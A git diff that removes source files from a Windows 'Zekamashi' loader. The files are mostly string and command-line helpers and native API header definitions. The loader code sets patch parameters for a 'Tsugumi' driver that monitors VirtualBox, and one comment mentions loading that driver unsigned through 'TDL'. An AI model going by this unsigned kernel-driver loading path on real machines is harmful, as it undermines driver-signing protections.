- if (supProcessExist(L"VirtualBox.exe")) {
- cuiPrintText(TEXT("Ldr: VirtualBox is running, close it before"), TRUE);
- break;
- }
-#endif
-
- if (!SetTsmiParams()) {
- cuiPrintText(TEXT("Ldr: Cannot write Tsugumi settings"), TRUE);
- break;
- }
- else {
- cuiPrintText(TEXT("Ldr: Tsugumi patch table parameters set"), TRUE);
- }
-
- //
- // Load signed Tsugumi.sys, otherwise we expect TDL already loaded unsigned driver.
- //
-#ifdef _SIGNED_BUILD
- if (!supLoadDeviceDriver()) {
- cuiPrintText(TEXT("Ldr: Failed to load Tsugumi monitor driver"), TRUE);
- break;
- }
-#else
- bTryVBoxRestart = TRUE;
-#endif
- //send command to driver
- SendCommand(uCmd, TEXT("TSUGUMI_IOCTL_REFRESH_LIST"));
-
- } while (cond);
-
- if (bTryVBoxRestart) {
- l = 0;
- if (supRestartVBoxDrv(&l)) {
- cuiPrintText(TEXT("Ldr: supRestartVBoxDrv success"), TRUE);
- }
- else {
- _strcpy(szBuffer, TEXT("Ldr: supRestartVBoxDrv = 0x"));
- ultohex(l, _strend(szBuffer));
- cuiPrintText(szBuffer, TRUE);
- }
- }
-
- cuiPrintText(TEXT("Ldr: exit"), TRUE);
- InterlockedDecrement((PLONG)&g_lApplicationInstances);
- ExitProcess(0);
-}
diff --git a/Source/Zekamashi/loader/minirtl/_strcat.c b/Source/Zekamashi/loader/minirtl/_strcat.c
deleted file mode 100644
index eb3c136..0000000
--- a/Source/Zekamashi/loader/minirtl/_strcat.c
+++ /dev/null
@@ -1,37 +0,0 @@
-#include "rtltypes.h"
-
-char *_strcat_a(char *dest, const char *src)
-{
- if ( (dest==0) || (src==0) )
- return dest;
-
- while ( *dest!=0 )
- dest++;
-
- while ( *src!=0 ) {
- *dest = *src;
- dest++;
- src++;
- }
-
- *dest = 0;
- return dest;
-}
-
-wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src)
-{
- if ( (dest==0) || (src==0) )
- return dest;
-
- while ( *dest!=0 )
- dest++;
-
- while ( *src!=0 ) {
- *dest = *src;
- dest++;
- src++;
- }
-
- *dest = 0;
- return dest;
-}
diff --git a/Source/Zekamashi/loader/minirtl/_strcpy.c b/Source/Zekamashi/loader/minirtl/_strcpy.c
deleted file mode 100644
index bad5c90..0000000
--- a/Source/Zekamashi/loader/minirtl/_strcpy.c
+++ /dev/null
@@ -1,43 +0,0 @@
-#include "rtltypes.h"
-
-char *_strcpy_a(char *dest, const char *src)
-{
- char *p;
-
- if ( (dest==0) || (src==0) )
- return dest;
-
- if (dest == src)
- return dest;
-
- p = dest;
- while ( *src!=0 ) {
- *p = *src;
- p++;
- src++;
- }
-
- *p = 0;
- return dest;
-}
-
-wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src)
-{
- wchar_t *p;
-
- if ((dest == 0) || (src == 0))
- return dest;
-
- if (dest == src)
- return dest;
-
- p = dest;
- while ( *src!=0 ) {
- *p = *src;
- p++;
- src++;
- }
-
- *p = 0;
- return dest;
-}
diff --git a/Source/Zekamashi/loader/minirtl/_strend.c b/Source/Zekamashi/loader/minirtl/_strend.c
deleted file mode 100644
index a4d4b6a..0000000
--- a/Source/Zekamashi/loader/minirtl/_strend.c
+++ /dev/null
@@ -1,23 +0,0 @@
-#include "rtltypes.h"
-
-char *_strend_a(const char *s)
-{
- if ( s==0 )
- return 0;
-
- while ( *s!=0 )
- s++;
-
- return (char *)s;
-}
-
-wchar_t *_strend_w(const wchar_t *s)
-{
- if ( s==0 )
- return 0;
-
- while ( *s!=0 )
- s++;
-
- return (wchar_t *)s;
-}
diff --git a/Source/Zekamashi/loader/minirtl/_strlen.c b/Source/Zekamashi/loader/minirtl/_strlen.c
deleted file mode 100644
index 1feda9e..0000000
--- a/Source/Zekamashi/loader/minirtl/_strlen.c
+++ /dev/null
@@ -1,27 +0,0 @@
-#include "rtltypes.h"
-
-size_t _strlen_a(const char *s)
-{
- char *s0 = (char *)s;
-
- if ( s==0 )
- return 0;
-
- while ( *s!=0 )
- s++;
-
- return (s-s0);
-}
-
-size_t _strlen_w(const wchar_t *s)
-{
- wchar_t *s0 = (wchar_t *)s;
-
- if ( s==0 )
- return 0;
-
- while ( *s!=0 )
- s++;
-
- return (s-s0);
-}
diff --git a/Source/Zekamashi/loader/minirtl/cmdline.c b/Source/Zekamashi/loader/minirtl/cmdline.c
deleted file mode 100644
index 1a3aecb..0000000
--- a/Source/Zekamashi/loader/minirtl/cmdline.c
+++ /dev/null
@@ -1,180 +0,0 @@
-#include
-
-BOOL GetCommandLineParamW(
- IN LPCWSTR CmdLine,
- IN ULONG ParamIndex,
- OUT LPWSTR Buffer,
- IN ULONG BufferSize,
- OUT PULONG ParamLen
- )
-{
- ULONG c, plen = 0;
- TCHAR divider;
-
- if (ParamLen != NULL)
- *ParamLen = 0;
-
- if (CmdLine == NULL) {
- if ((Buffer != NULL) && (BufferSize > 0))
- *Buffer = 0;
- return FALSE;
- }
-
- for (c = 0; c <= ParamIndex; c++) {
- plen = 0;
-
- while (*CmdLine == ' ')
- CmdLine++;
-
- switch (*CmdLine) {
- case 0:
- goto zero_term_exit;
-
- case '"':
- CmdLine++;
- divider = '"';
- break;
-
- default:
- divider = ' ';
- }
-
- while ((*CmdLine != '"') && (*CmdLine != divider) && (*CmdLine != 0)) {
- plen++;
- if (c == ParamIndex)
- if ((plen < BufferSize) && (Buffer != NULL)) {
- *Buffer = *CmdLine;
- Buffer++;
- }
- CmdLine++;
- }
-
- if (*CmdLine != 0)
- CmdLine++;
- }
-
-zero_term_exit:
-
- if ((Buffer != NULL) && (BufferSize > 0))
- *Buffer = 0;
-
- if (ParamLen != NULL)
- *ParamLen = plen;
-
- if (plen < BufferSize)
- return TRUE;
- else
- return FALSE;
-}
-
-BOOL GetCommandLineParamA(
- IN LPCSTR CmdLine,
- IN ULONG ParamIndex,
- OUT LPSTR Buffer,
- IN ULONG BufferSize,
- OUT PULONG ParamLen
- )
-{
- ULONG c, plen = 0;
- TCHAR divider;
-
- if (CmdLine == NULL)
- return FALSE;
-
- if (ParamLen != NULL)
- *ParamLen = 0;
-
- for (c = 0; c <= ParamIndex; c++) {
- plen = 0;
-
- while (*CmdLine == ' ')
- CmdLine++;
-
- switch (*CmdLine) {
- case 0:
- goto zero_term_exit;
-
- case '"':
- CmdLine++;
- divider = '"';
- break;
-
- default:
- divider = ' ';
- }
-
- while ((*CmdLine != '"') && (*CmdLine != divider) && (*CmdLine != 0)) {
- plen++;
- if (c == ParamIndex)
- if ((plen < BufferSize) && (Buffer != NULL)) {
- *Buffer = *CmdLine;
- Buffer++;
- }
- CmdLine++;
- }
-
- if (*CmdLine != 0)
- CmdLine++;
- }
-
-zero_term_exit:
-
- if ((Buffer != NULL) && (BufferSize > 0))
- *Buffer = 0;
-
- if (ParamLen != NULL)
- *ParamLen = plen;
-
- if (plen < BufferSize)
- return TRUE;
- else
- return FALSE;
-}
-
-char *ExtractFilePathA(const char *FileName, char *FilePath)
-{
- char *p = (char *)FileName, *p0 = (char *)FileName;
-
- if ((FileName == 0) || (FilePath == 0))
- return 0;
-
- while (*FileName != 0) {
- if (*FileName == '\\')
- p = (char *)FileName + 1;
- FileName++;
- }
-
- while (p0 < p) {
- *FilePath = *p0;
- FilePath++;
- p0++;
- }
-
- *FilePath = 0;
-
- return FilePath;
-}
-
-wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath)
-{
- wchar_t *p = (wchar_t *)FileName, *p0 = (wchar_t *)FileName;
-
- if ((FileName == 0) || (FilePath == 0))
- return 0;
-
- while (*FileName != 0) {
- if (*FileName == '\\')
- p = (wchar_t *)FileName + 1;
- FileName++;
- }
-
- while (p0 < p) {
- *FilePath = *p0;
- FilePath++;
- p0++;
- }
-
- *FilePath = 0;
-
- return FilePath;
-}
diff --git a/Source/Zekamashi/loader/minirtl/cmdline.h b/Source/Zekamashi/loader/minirtl/cmdline.h
deleted file mode 100644
index 310a4a5..0000000
--- a/Source/Zekamashi/loader/minirtl/cmdline.h
+++ /dev/null
@@ -1,35 +0,0 @@
-#ifndef _CMDLINEH_
-#define _CMDLINEH_
-
-BOOL GetCommandLineParamW(
- IN LPCWSTR CmdLine,
- IN ULONG ParamIndex,
- OUT LPWSTR Buffer,
- IN ULONG BufferSize,
- OUT PULONG ParamLen
- );
-
-BOOL GetCommandLineParamA(
- IN LPCSTR CmdLine,
- IN ULONG ParamIndex,
- OUT LPSTR Buffer,
- IN ULONG BufferSize,
- OUT PULONG ParamLen
- );
-
-char *ExtractFilePathA(const char *FileName, char *FilePath);
-wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath);
-
-#ifdef UNICODE
-
-#define ExtractFilePath ExtractFilePathW
-#define GetCommandLineParam GetCommandLineParamW
-
-#else // ANSI
-
-#define ExtractFilePath ExtractFilePathA
-#define GetCommandLineParam GetCommandLineParamA
-
-#endif
-
-#endif /* _CMDLINEH_ */
diff --git a/Source/Zekamashi/loader/minirtl/minirtl.h b/Source/Zekamashi/loader/minirtl/minirtl.h
deleted file mode 100644
index 17cf519..0000000
--- a/Source/Zekamashi/loader/minirtl/minirtl.h
+++ /dev/null
@@ -1,155 +0,0 @@
-/*
-Module name:
- minirtl.h
-
-Description:
- header for string handling and conversion routines
-
-Date:
- 1 Mar 2015
-*/
-
-#ifndef _MINIRTL_
-#define _MINIRTL_
-
-// string copy/concat/length
-
-char *_strend_a(const char *s);
-wchar_t *_strend_w(const wchar_t *s);
-
-char *_strcpy_a(char *dest, const char *src);
-wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src);
-
-char *_strcat_a(char *dest, const char *src);
-wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src);
-
-char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc);
-wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc);
-
-size_t _strlen_a(const char *s);
-size_t _strlen_w(const wchar_t *s);
-
-// comparing
-
-int _strcmp_a(const char *s1, const char *s2);
-int _strcmp_w(const wchar_t *s1, const wchar_t *s2);
-
-int _strncmp_a(const char *s1, const char *s2, size_t cchars);
-int _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);
-
-int _strcmpi_a(const char *s1, const char *s2);
-int _strcmpi_w(const wchar_t *s1, const wchar_t *s2);
-
-int _strncmpi_a(const char *s1, const char *s2, size_t cchars);
-int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);
-
-char *_strstr_a(const char *s, const char *sub_s);
-wchar_t *_strstr_w(const wchar_t *s, const wchar_t *sub_s);
-
-char *_strstri_a(const char *s, const char *sub_s);
-wchar_t *_strstri_w(const wchar_t *s, const wchar_t *sub_s);
-
-// conversion of integer types to string, returning string length
-
-size_t ultostr_a(unsigned long x, char *s);
-size_t ultostr_w(unsigned long x, wchar_t *s);
-
-size_t ultohex_a(unsigned long x, char *s);
-size_t ultohex_w(unsigned long x, wchar_t *s);
-
-size_t itostr_a(int x, char *s);
-size_t itostr_w(int x, wchar_t *s);
-
-size_t i64tostr_a(signed long long x, char *s);
-size_t i64tostr_w(signed long long x, wchar_t *s);
-
-size_t u64tostr_a(unsigned long long x, char *s);
-size_t u64tostr_w(unsigned long long x, wchar_t *s);
-
-size_t u64tohex_a(unsigned long long x, char *s);
-size_t u64tohex_w(unsigned long long x, wchar_t *s);
-
-// string to integers conversion
-
-unsigned long strtoul_a(char *s);
-unsigned long strtoul_w(wchar_t *s);
-
-unsigned long long strtou64_a(char *s);
-unsigned long long strtou64_w(wchar_t *s);
-
-unsigned long hextoul_a(char *s);
-unsigned long hextoul_w(wchar_t *s);
-
-int strtoi_a(char *s);
-int strtoi_w(wchar_t *s);
-
-signed long long strtoi64_a(char *s);
-signed long long strtoi64_w(wchar_t *s);
-
-unsigned long long hextou64_a(char *s);
-unsigned long long hextou64_w(wchar_t *s);
-
-/* =================================== */
-
-#ifdef UNICODE
-
-#define _strend _strend_w
-#define _strcpy _strcpy_w
-#define _strcat _strcat_w
-#define _strlen _strlen_w
-#define _strncpy _strncpy_w
-
-#define _strcmp _strcmp_w
-#define _strncmp _strncmp_w
-#define _strcmpi _strcmpi_w
-#define _strncmpi _strncmpi_w
-#define _strstr _strstr_w
-#define _strstri _strstri_w
-
-#define ultostr ultostr_w
-#define ultohex ultohex_w
-#define itostr itostr_w
-#define i64tostr i64tostr_w
-#define u64tostr u64tostr_w
-#define u64tohex u64tohex_w
-
-#define strtoul strtoul_w
-#define hextoul hextoul_w
-#define strtoi strtoi_w
-#define strtoi64 strtoi64_w
-#define strtou64 strtou64_w
-#define hextou64 hextou64_w
-
-#else // ANSI
-
-#define _strend _strend_a
-#define _strcpy _strcpy_a
-#define _strcat _strcat_a
-#define _strlen _strlen_a
-#define _strncpy _strncpy_a
-#define _strcmp _strcmp_a
-
-#define _strcmp _strcmp_a
-#define _strncmp _strncmp_a
-#define _strcmpi _strcmpi_a
-#define _strncmpi _strncmpi_a
-#define _strstr _strstr_a
-#define _strstri _strstri_a
-
-#define ultostr ultostr_a
-#define ultohex ultohex_a
-#define itostr itostr_a
-#define i64tostr i64tostr_a
-#define u64tostr u64tostr_a
-#define u64tohex u64tohex_a
-
-#define strtoul strtoul_a
-#define hextoul hextoul_a
-#define strtoi strtoi_a
-#define strtoi64 strtoi64_a
-#define strtou64 strtou64_a
-#define hextou64 hextou64_a
-
-#endif
-
-#endif /* _MINIRTL_ */
diff --git a/Source/Zekamashi/loader/minirtl/rtltypes.h b/Source/Zekamashi/loader/minirtl/rtltypes.h
deleted file mode 100644
index fbb8b2d..0000000
--- a/Source/Zekamashi/loader/minirtl/rtltypes.h
+++ /dev/null
@@ -1,43 +0,0 @@
-#ifndef _WCHAR_T_DEFINED
-typedef unsigned short wchar_t;
-#define _WCHAR_T_DEFINED
-#endif /* _WCHAR_T_DEFINED */
-
-#ifndef _SIZE_T_DEFINED
-#ifdef _WIN64
-typedef unsigned __int64 size_t;
-#else /* _WIN64 */
-typedef __w64 unsigned int size_t;
-#endif /* _WIN64 */
-#define _SIZE_T_DEFINED
-#endif /* _SIZE_T_DEFINED */
-
-__forceinline char locase_a(char c)
-{
- if ((c >= 'A') && (c <= 'Z'))
- return c + 0x20;
- else
- return c;
-}
-
-__forceinline wchar_t locase_w(wchar_t c)
-{
- if ((c >= 'A') && (c <= 'Z'))
- return c + 0x20;
- else
- return c;
-}
-
-__forceinline char byteabs(char x) {
- if (x < 0)
- return -x;
- return x;
-}
-
-__forceinline int _isdigit_a(char x) {
- return ((x >= '0') && (x <= '9'));
-}
-
-__forceinline int _isdigit_w(wchar_t x) {
- return ((x >= L'0') && (x <= L'9'));
-}
diff --git a/Source/Zekamashi/loader/minirtl/u64tohex.c b/Source/Zekamashi/loader/minirtl/u64tohex.c
deleted file mode 100644
index 1e7af7f..0000000
--- a/Source/Zekamashi/loader/minirtl/u64tohex.c
+++ /dev/null
@@ -1,49 +0,0 @@
-#include "rtltypes.h"
-
-size_t u64tohex_a(unsigned long long x, char *s)
-{
- char p;
- size_t c;
-
- if (s==0)
- return 16;
-
- for (c=0; c<16; c++) {
- p = (char)(x & 0xf);
- x >>= 4;
-
- if (p<10)
- p += '0';
- else
- p = 'A' + (p-10);
-
- s[15-c] = p;
- }
-
- s[16] = 0;
- return 16;
-}
-
-size_t u64tohex_w(unsigned long long x, wchar_t *s)
-{
- wchar_t p;
- size_t c;
-
- if (s==0)
- return 16;
-
- for (c = 0; c<16; c++) {
- p = (wchar_t)(x & 0xf);
- x >>= 4;
-
- if (p<10)
- p += L'0';
- else
- p = L'A' + (p-10);
-
- s[15-c] = p;
- }
-
- s[16] = 0;
- return 16;
-}
diff --git a/Source/Zekamashi/loader/minirtl/u64tostr.c b/Source/Zekamashi/loader/minirtl/u64tostr.c
deleted file mode 100644
index 24c4dba..0000000
--- a/Source/Zekamashi/loader/minirtl/u64tostr.c
+++ /dev/null
@@ -1,45 +0,0 @@
-#include "rtltypes.h"
-
-size_t u64tostr_a(unsigned long long x, char *s)
-{
- unsigned long long t = x;
- size_t i, r=1;
-
- while ( t >= 10 ) {
- t /= 10;
- r++;
- }
-
- if (s == 0)
- return r;
-
- for (i = r; i != 0; i--) {
- s[i-1] = (char)(x % 10) + '0';
- x /= 10;
- }
-
- s[r] = (char)0;
- return r;
-}
-
-size_t u64tostr_w(unsigned long long x, wchar_t *s)
-{
- unsigned long long t = x;
- size_t i, r=1;
-
- while ( t >= 10 ) {
- t /= 10;
- r++;
- }
-
- if (s == 0)
- return r;
-
- for (i = r; i != 0; i--) {
- s[i-1] = (wchar_t)(x % 10) + L'0';
- x /= 10;
- }
-
- s[r] = (wchar_t)0;
- return r;
-}
diff --git a/Source/Zekamashi/loader/minirtl/ultohex.c b/Source/Zekamashi/loader/minirtl/ultohex.c
deleted file mode 100644
index 2529c9c..0000000
--- a/Source/Zekamashi/loader/minirtl/ultohex.c
+++ /dev/null
@@ -1,49 +0,0 @@
-#include "rtltypes.h"
-
-size_t ultohex_a(unsigned long x, char *s)
-{
- char p;
- size_t c;
-
- if (s==0)
- return 8;
-
- for (c=0; c<8; c++) {
- p = (char)(x & 0xf);
- x >>= 4;
-
- if (p<10)
- p += '0';
- else
- p = 'A' + (p-10);
-
- s[7-c] = p;
- }
-
- s[8] = 0;
- return 8;
-}
-
-size_t ultohex_w(unsigned long x, wchar_t *s)
-{
- wchar_t p;
- size_t c;
-
- if (s==0)
- return 8;
-
- for (c=0; c<8; c++) {
- p = (wchar_t)(x & 0xf);
- x >>= 4;
-
- if (p<10)
- p += L'0';
- else
- p = L'A' + (p-10);
-
- s[7-c] = p;
- }
-
- s[8] = 0;
- return 8;
-}
diff --git a/Source/Zekamashi/loader/ntos.h b/Source/Zekamashi/loader/ntos.h
deleted file mode 100644
index 2f1516e..0000000
--- a/Source/Zekamashi/loader/ntos.h
+++ /dev/null
@@ -1,10902 +0,0 @@
-/************************************************************************************
-*
-* (C) COPYRIGHT AUTHORS, 2015 - 2018, translated from Microsoft sources/debugger
-*
-* TITLE: NTOS.H
-*
-* VERSION: 1.98
-*
-* DATE: 28 Dec 2018
-*
-* Common header file for the ntos API functions and definitions.
-*
-* Only projects required API/definitions.
-*
-* Depends on: Windows.h
-* NtStatus.h
-*
-* Include: Windows.h
-* NtStatus.h
-*
-* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
-* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
-* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
-* PARTICULAR PURPOSE.
-*
-************************************************************************************/
-
-#ifndef NTOS_RTL
-#define NTOS_RTL
-
-//
-// NTOS_RTL HEADER BEGIN
-//
-
-#if defined(__cplusplus)
-extern "C" {
-#endif
-
-#pragma comment(lib, "ntdll.lib")
-
-#pragma warning(push)
-#pragma warning(disable: 4214) // nonstandard extension used : bit field types other than int
-
-#ifndef PAGE_SIZE
-#define PAGE_SIZE 0x1000ull
-#endif
-
-#ifndef ABSOLUTE_TIME
-#define ABSOLUTE_TIME(wait) (wait)
-#endif
-
-#ifndef RELATIVE_TIME
-#define RELATIVE_TIME(wait) (-(wait))
-#endif
-
-#ifndef NANOSECONDS
-#define NANOSECONDS(nanos) (((signed __int64)(nanos)) / 100L)
-#endif
-
-#ifndef MICROSECONDS
-#define MICROSECONDS(micros) (((signed __int64)(micros)) * NANOSECONDS(1000L))
-#endif
-
-#ifndef MILLISECONDS
-#define MILLISECONDS(milli) (((signed __int64)(milli)) * MICROSECONDS(1000L))
-#endif
-
-#ifndef SECONDS
-#define SECONDS(seconds) (((signed __int64)(seconds)) * MILLISECONDS(1000L))
-#endif
-
-#ifndef POI //poi-poi
-#define POI(addr) *(ULONG *)(addr)
-#endif
-
-typedef char CCHAR;
-typedef unsigned char UCHAR;
-typedef CCHAR KPROCESSOR_MODE;
-typedef UCHAR KIRQL;
-typedef KIRQL *PKIRQL;
-
-#ifndef IN_REGION
-#define IN_REGION(x, Base, Size) (((ULONG_PTR)(x) >= (ULONG_PTR)(Base)) && \
- ((ULONG_PTR)(x) <= (ULONG_PTR)(Base) + (ULONG_PTR)(Size)))
-#endif
-
-//
-// Define alignment macros to align structure sizes and pointers up and down.
-//
-
-#ifndef ALIGN_UP_TYPE
-#define ALIGN_UP_TYPE(Address, Align) (((ULONG_PTR)(Address) + (Align) - 1) & ~((Align) - 1))
-#endif
-
-#ifndef ALIGN_UP
-#define ALIGN_UP(Address, Type) ALIGN_UP_TYPE(Address, sizeof(Type))
-#endif
-
-#ifndef ALIGN_DOWN_TYPE
-#define ALIGN_DOWN_TYPE(Address, Align) ((ULONG_PTR)(Address) & ~((ULONG_PTR)(Align) - 1))
-#endif
-
-#ifndef ALIGN_DOWN
-#define ALIGN_DOWN(Address, Type) ALIGN_DOWN_TYPE(Address, sizeof(Type))
-#endif
-
-#ifndef ALIGN_UP_BY
-#define ALIGN_UP_BY(Address, Align) (((ULONG_PTR)(Address) + (Align) - 1) & ~((Align) - 1))
-#endif
-
-#ifndef ALIGN_DOWN_BY
-#define ALIGN_DOWN_BY(Address, Align) ((ULONG_PTR)(Address) & ~((ULONG_PTR)(Align) - 1))
-#endif
-
-#ifndef ALIGN_UP_POINTER_BY
-#define ALIGN_UP_POINTER_BY(Pointer, Align) ((PVOID)ALIGN_UP_BY(Pointer, Align))
-#endif
-
-#ifndef ALIGN_DOWN_POINTER_BY
-#define ALIGN_DOWN_POINTER_BY(Pointer, Align) ((PVOID)ALIGN_DOWN_BY(Pointer, Align))
-#endif
-
-#ifndef ALIGN_UP_POINTER
-#define ALIGN_UP_POINTER(Pointer, Type) ((PVOID)ALIGN_UP(Pointer, Type))
-#endif
-
-#ifndef ALIGN_DOWN_POINTER
-#define ALIGN_DOWN_POINTER(Pointer, Type) ((PVOID)ALIGN_DOWN(Pointer, Type))
-#endif
-
-#ifndef ARGUMENT_PRESENT
-#define ARGUMENT_PRESENT(ArgumentPointer) (\
- (CHAR *)((ULONG_PTR)(ArgumentPointer)) != (CHAR *)(NULL) )
-#endif
-
-#ifndef LOGICAL
-#define LOGICAL ULONG
-#endif
-
-#define NtCurrentProcess() ((HANDLE)(LONG_PTR)-1)
-#define ZwCurrentProcess() NtCurrentProcess()
-#define NtCurrentThread() ((HANDLE)(LONG_PTR)-2)
-#define ZwCurrentThread() NtCurrentThread()
-#define NtCurrentSession() ((HANDLE)(LONG_PTR)-3)
-#define ZwCurrentSession() NtCurrentSession()
-
-//Valid Only for Windows 8+
-#define NtCurrentProcessToken() ((HANDLE)(LONG_PTR)-4)
-#define NtCurrentThreadToken() ((HANDLE)(LONG_PTR)-5)
-#define NtCurrentEffectiveToken() ((HANDLE)(LONG_PTR)-6)
-
-//
-// ntdef.h begin
-//
-#ifndef RTL_CONSTANT_STRING
-char _RTL_CONSTANT_STRING_type_check(const void *s);
-#define _RTL_CONSTANT_STRING_remove_const_macro(s) (s)
-#define RTL_CONSTANT_STRING(s) \
-{ \
- sizeof( s ) - sizeof( (s)[0] ), \
- sizeof( s ) / sizeof(_RTL_CONSTANT_STRING_type_check(s)), \
- _RTL_CONSTANT_STRING_remove_const_macro(s) \
-}
-#endif
-
-#define RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a) \
- { sizeof(OBJECT_ATTRIBUTES), NULL, RTL_CONST_CAST(PUNICODE_STRING)(n), a, NULL, NULL }
-
-// This synonym is more appropriate for initializing what isn't actually const.
-#define RTL_INIT_OBJECT_ATTRIBUTES(n, a) RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a)
-
-//
-// ntdef.h end
-//
-
-#define RtlOffsetToPointer(Base, Offset) ((PCHAR)( ((PCHAR)(Base)) + ((ULONG_PTR)(Offset)) ))
-#define RtlPointerToOffset(Base, Pointer) ((ULONG)( ((PCHAR)(Pointer)) - ((PCHAR)(Base)) ))
-
-
-typedef ULONG CLONG;
-typedef LONG KPRIORITY;
-typedef short CSHORT;
-typedef ULONGLONG REGHANDLE, *PREGHANDLE;
-typedef PVOID *PDEVICE_MAP;
-typedef PVOID PHEAD;
-
-//
-// Valid values for the OBJECT_ATTRIBUTES.Attributes field
-//
-#define OBJ_INHERIT 0x00000002L
-#define OBJ_PERMANENT 0x00000010L
-#define OBJ_EXCLUSIVE 0x00000020L
-#define OBJ_CASE_INSENSITIVE 0x00000040L
-#define OBJ_OPENIF 0x00000080L
-#define OBJ_OPENLINK 0x00000100L
-#define OBJ_KERNEL_HANDLE 0x00000200L
-#define OBJ_FORCE_ACCESS_CHECK 0x00000400L
-#define OBJ_VALID_ATTRIBUTES 0x000007F2L
-
-//
-// Callback Object Rights
-//
-#define CALLBACK_MODIFY_STATE 0x0001
-#define CALLBACK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|CALLBACK_MODIFY_STATE )
-
-//
-// Debug Object Access Rights
-//
-#define DEBUG_READ_EVENT (0x0001)
-#define DEBUG_PROCESS_ASSIGN (0x0002)
-#define DEBUG_SET_INFORMATION (0x0004)
-#define DEBUG_QUERY_INFORMATION (0x0008)
-#define DEBUG_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|DEBUG_READ_EVENT|DEBUG_PROCESS_ASSIGN|\
- DEBUG_SET_INFORMATION|DEBUG_QUERY_INFORMATION)
-
-//
-// Directory Object Access Rights
-//
-#define DIRECTORY_QUERY (0x0001)
-#define DIRECTORY_TRAVERSE (0x0002)
-#define DIRECTORY_CREATE_OBJECT (0x0004)
-#define DIRECTORY_CREATE_SUBDIRECTORY (0x0008)
-#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF)
-
-//
-// Event Object Access Rights
-//
-#define EVENT_QUERY_STATE 0x0001
-#define EVENT_MODIFY_STATE 0x0002
-#define EVENT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3)
-
-//
-// EventPair Object Access Rights
-//
-#define EVENT_PAIR_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE)
-
-//
-// I/O Completion Object Access Rights
-//
-#define IO_COMPLETION_QUERY_STATE 0x0001
-#define IO_COMPLETION_MODIFY_STATE 0x0002
-#define IO_COMPLETION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3)
-
-//
-// KeyedEvent Object Access Rights
-//
-#define KEYEDEVENT_WAIT 0x0001
-#define KEYEDEVENT_WAKE 0x0002
-#define KEYEDEVENT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | KEYEDEVENT_WAIT | KEYEDEVENT_WAKE)
-
-//
-// Mutant Object Access Rights
-//
-#define MUTANT_QUERY_STATE 0x0001
-#ifndef MUTANT_ALL_ACCESS //SDK compatibility
-#define MUTANT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|MUTANT_QUERY_STATE)
-#endif
-
-//
-// Port Object Access Rights
-//
-#define PORT_CONNECT (0x0001)
-#define PORT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | PORT_CONNECT)
-
-//
-// Profile Object Access Rights
-//
-#define PROFILE_CONTROL (0x0001)
-#define PROFILE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | PROFILE_CONTROL)
-
-//
-// Semaphore Object Access Rights
-//
-#define SEMAPHORE_QUERY_STATE 0x0001
-#define SEMAPHORE_MODIFY_STATE 0x0002
-#define SEMAPHORE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3)
-
-//
-// SymbolicLink Object Access Rights
-//
-#define SYMBOLIC_LINK_QUERY (0x0001)
-#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYMBOLIC_LINK_QUERY)
-
-//
-// Thread Object Access Rights
-//
-#define THREAD_ALERT (0x0004)
-
-#define THREAD_CREATE_FLAGS_CREATE_SUSPENDED 0x00000001
-#define THREAD_CREATE_FLAGS_SKIP_THREAD_ATTACH 0x00000002
-#define THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER 0x00000004
-#define THREAD_CREATE_FLAGS_HAS_SECURITY_DESCRIPTOR 0x00000010
-#define THREAD_CREATE_FLAGS_ACCESS_CHECK_IN_TARGET 0x00000020
-#define THREAD_CREATE_FLAGS_INITIAL_THREAD 0x00000080
-
-//
-// Worker Factory Object Access Rights
-//
-#define WORKER_FACTORY_RELEASE_WORKER 0x0001
-#define WORKER_FACTORY_WAIT 0x0002
-#define WORKER_FACTORY_SET_INFORMATION 0x0004
-#define WORKER_FACTORY_QUERY_INFORMATION 0x0008
-#define WORKER_FACTORY_READY_WORKER 0x0010
-#define WORKER_FACTORY_SHUTDOWN 0x0020
-
-#define WORKER_FACTORY_ALL_ACCESS ( \
- STANDARD_RIGHTS_REQUIRED | \
- WORKER_FACTORY_RELEASE_WORKER | \
- WORKER_FACTORY_WAIT | \
- WORKER_FACTORY_SET_INFORMATION | \
- WORKER_FACTORY_QUERY_INFORMATION | \
- WORKER_FACTORY_READY_WORKER | \
- WORKER_FACTORY_SHUTDOWN \
- )
-
-//
-// Type Object Access Rights
-//
-#define OBJECT_TYPE_CREATE (0x0001)
-#define OBJECT_TYPE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | OBJECT_TYPE_CREATE)
-
-//
-// WMI Object Access Rights
-//
-#define WMIGUID_QUERY 0x0001
-#define WMIGUID_SET 0x0002
-#define WMIGUID_NOTIFICATION 0x0004
-#define WMIGUID_READ_DESCRIPTION 0x0008
-#define WMIGUID_EXECUTE 0x0010
-#define TRACELOG_CREATE_REALTIME 0x0020
